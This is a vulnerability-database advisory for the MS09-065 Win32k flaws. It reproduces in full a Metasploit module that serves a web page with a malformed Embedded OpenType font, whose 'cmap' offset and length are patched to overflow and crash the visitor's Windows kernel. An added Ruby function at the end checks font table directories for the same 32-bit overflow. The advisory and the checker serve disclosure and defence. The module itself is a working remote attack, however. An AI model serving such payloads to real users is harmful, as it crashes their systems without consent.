Microsoft Windows Win32k Kernel-Mode Driver Local Privilege Escalation (MS09-065)

2009-11-11T00:00:00
ID SSV:12609
Type seebug
Reporter Root
Modified 2009-11-11T00:00:00

Description

BUGTRAQ ID: 36939, 36941
CVE ID: CVE-2009-1127, CVE-2009-2513

Microsoft Windows is a very popular operating system released by Microsoft.

The Win32k kernel-mode driver (Win32k.sys) in Windows does not properly validate the parameters passed to Windows kernel system calls, nor the input passed from user mode through the GDI kernel component. An attacker who holds valid logon credentials and can log on locally could exploit these vulnerabilities to execute arbitrary kernel-mode code.

Affected systems:

Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Vista
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2008
Microsoft Windows Server 2003 SP2
Microsoft Windows 2000 SP4

Vendor patch:

Microsoft

Microsoft has released a security bulletin (MS09-065) and the corresponding patch for this issue:
MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947)
Link: http://www.microsoft.com/technet/security/bulletin/ms09-065.mspx?pf=true

##
# $Id: ms09_065_eot_integer.rb 7470 2009-11-11 23:48:53Z hdm $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
 
require 'msf/core'
 
 
class Metasploit3 < Msf::Auxiliary
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Microsoft Windows EOT Font Table Directory Integer Overflow',
            'Description'    => %q{
                This module exploits an integer overflow flaw in the Microsoft Windows Embedded
            OpenType font parsing code located in win32k.sys. Since the kernel itself parses
            embedded web fonts, it is possible to trigger a BSoD from a normal web page when
            viewed with Internet Explorer.
            },
            'License'        => MSF_LICENSE,
            'Author'         => 'hdm',
            'Version'        => '$Revision: 7470 $',
            'References'     =>
                [
                    [ 'CVE', '2009-2514' ],
                    [ 'MSB', 'MS09-065' ],
                    [ 'OSVDB', '59869']
                ],
            'DisclosureDate' => 'Nov 10 2009'
        ))
        register_options([
            OptPath.new('EOTFILE', [ true, "The EOT template to use to generate the trigger", File.join(Msf::Config.install_root, "data", "exploits", "pricedown.eot")]),
        ], self.class)
 
    end
 
    def run
        exploit
    end
 
    def on_request_uri(cli, request)
        @tag ||= Rex::Text.rand_text_alpha(8)
        @eot ||= ::File.read(datastore['EOTFILE'], ::File.size(datastore['EOTFILE']))
 
        if(request.uri =~ /#{@tag}$/)
            content = @eot.dup
 
            # Only this table entry seems to trigger the bug
            cidx = content.index('cmap')
 
            # Use an offset and a length that overflow when combined
            coff = 0xb0000000
            clen = (0xfffffffe - coff + 0xcc)
 
            # Patch in the modified offset and length values
            content[cidx + 8, 8] = [ coff, clen ].pack("N*")
 
            # Send the font on its merry way
            print_status("Sending embedded font to #{cli.peerhost}:#{cli.peerport}...")
            send_response_html(cli, content, { 'Content-Type' => 'application/octet-stream' })
        else
            var_title = Rex::Text.rand_text_alpha(6 + rand(32))
            var_body = Rex::Text.rand_text_alpha(64 + rand(32))
            var_font = Rex::Text.rand_text_alpha(2 + rand(6))
            var_face = Rex::Text.rand_text_alpha(2 + rand(32))
 
            content = %Q|<html><head><title>#{var_title}</title><style type="text/css">
@font-face{ font-family: '#{var_face}';  src: url('#{get_resource}/#{var_font}#{@tag}'); }
body {
    font-family: '#{var_face}';
}
</style></head><body> #{var_body} </body></html>|
 
            print_status("Sending HTML page with embedded font to #{cli.peerhost}:#{cli.peerport}...")
            send_response_html(cli, content, { 'Content-Type' => 'text/html' })
        end
    end
end
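As an added example (not part of the advisory or of the Metasploit module above), the following Ruby function performs the overflow-safe table-directory check that the vulnerable parser lacked: it walks the sfnt table records (tag, checksum, offset, length, the 16-byte layout the module patches at `cidx + 8`) and flags any entry whose offset + length would wrap a 32-bit sum. The sample font is constructed inline; the EOT wrapper is omitted and the check runs on the embedded sfnt body.

```ruby
# Overflow-safe validation of an sfnt (TrueType) table directory.
# Added example; not code from the advisory or the Metasploit module.

SFNT_HEADER_SIZE = 12  # version(4) numTables(2) searchRange(2) entrySelector(2) rangeShift(2)
SFNT_RECORD_SIZE = 16  # tag(4) checksum(4) offset(4) length(4)

# Return a list of problems found in the table directory of +font+, a binary
# String holding a bare sfnt body (the payload an EOT wrapper carries; the EOT
# header itself is not modelled here). An empty list means every table fits.
def check_table_directory(font)
  problems = []
  return ['file shorter than sfnt header'] if font.bytesize < SFNT_HEADER_SIZE

  num_tables = font.byteslice(4, 2).unpack1('n')
  dir_end = SFNT_HEADER_SIZE + num_tables * SFNT_RECORD_SIZE
  return ["directory of #{num_tables} tables exceeds file size"] if dir_end > font.bytesize

  num_tables.times do |i|
    rec = font.byteslice(SFNT_HEADER_SIZE + i * SFNT_RECORD_SIZE, SFNT_RECORD_SIZE)
    tag, _checksum, off, len = rec.unpack('a4N3')
    # Ruby integers do not wrap, so off + len is exact here. A C parser that
    # adds the two as uint32 would wrap and see a small, plausible end offset.
    if off + len > 0xffffffff
      wrapped = (off + len) & 0xffffffff
      problems << "#{tag}: offset 0x#{off.to_s(16)} + length 0x#{len.to_s(16)} " \
                  "wraps 32-bit (uint32 sum would be 0x#{wrapped.to_s(16)})"
    elsif off + len > font.bytesize
      problems << "#{tag}: table extends past end of file"
    end
  end
  problems
end

# Build a constructed two-table sfnt body: a sane 'head' record followed by a
# 'cmap' record carrying the caller's offset and length, then 64 bytes of data.
def build_sample_font(cmap_off, cmap_len)
  header = [0x00010000, 2, 32, 1, 0].pack('Nn4')
  head   = ['head', 0, SFNT_HEADER_SIZE + 2 * SFNT_RECORD_SIZE, 54].pack('a4N3')
  cmap   = ['cmap', 0, cmap_off, cmap_len].pack('a4N3')
  header + head + cmap + ("\x00" * 64).b
end

if __FILE__ == $PROGRAM_NAME
  # The same offset/length pair the module writes into the 'cmap' record.
  coff = 0xb0000000
  clen = 0xfffffffe - coff + 0xcc
  check_table_directory(build_sample_font(coff, clen)).each { |p| puts p }
end
```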